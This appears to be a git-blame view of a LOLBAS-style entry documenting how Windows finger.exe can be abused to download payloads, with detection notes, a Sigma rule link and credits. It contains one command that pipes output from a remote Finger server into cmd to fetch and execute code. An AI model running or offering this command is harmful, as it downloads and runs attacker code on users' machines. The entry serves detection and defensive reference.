2021-08-30 13:30:52 +02:00
---
2021-08-30 13:16:08 +02:00
Name : Finger.exe
Description : Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
Author : Ruben Revuelta
Created : 2021-08-30
Commands :
- Command : finger user@example.host.com | more +2 | cmd
2021-10-25 13:25:13 +02:00
Description : 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'
Usecase : Download malicious payload
2021-08-30 13:16:08 +02:00
Category : Download
Privileges : User
MitreID : T1105
2021-10-25 13:25:13 +02:00
OperatingSystem : Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
2021-08-30 13:16:08 +02:00
Full_Path :
- Path : c:\windows\system32\finger.exe
- Path : c:\windows\syswow64\finger.exe
2021-10-25 13:27:00 +02:00
Detection :
2021-11-15 14:19:03 +01:00
- Sigma : https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml
2021-10-25 13:25:13 +02:00
- IOC : finger.exe should not be run on a normal workstation.
2021-08-30 13:16:08 +02:00
- IOC : finger.exe connecting to external resources.
Resources :
2021-10-25 13:25:13 +02:00
- Link : https://twitter.com/DissectMalware/status/997340270273409024
2021-10-25 13:28:09 +02:00
- Link : https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
2021-08-30 13:16:08 +02:00
Acknowledgement :
- Person : Ruben Revuelta (MAPFRE CERT)
2021-10-25 13:25:13 +02:00
Handle : '@rubn_RB'
2021-08-30 13:16:08 +02:00
- Person : Jose A. Jimenez (MAPFRE CERT)
2021-10-25 13:25:13 +02:00
Handle : '@Ocelotty6669'
- Person : Malwrologist
Handle : '@DissectMalware'
2021-08-30 13:30:52 +02:00
---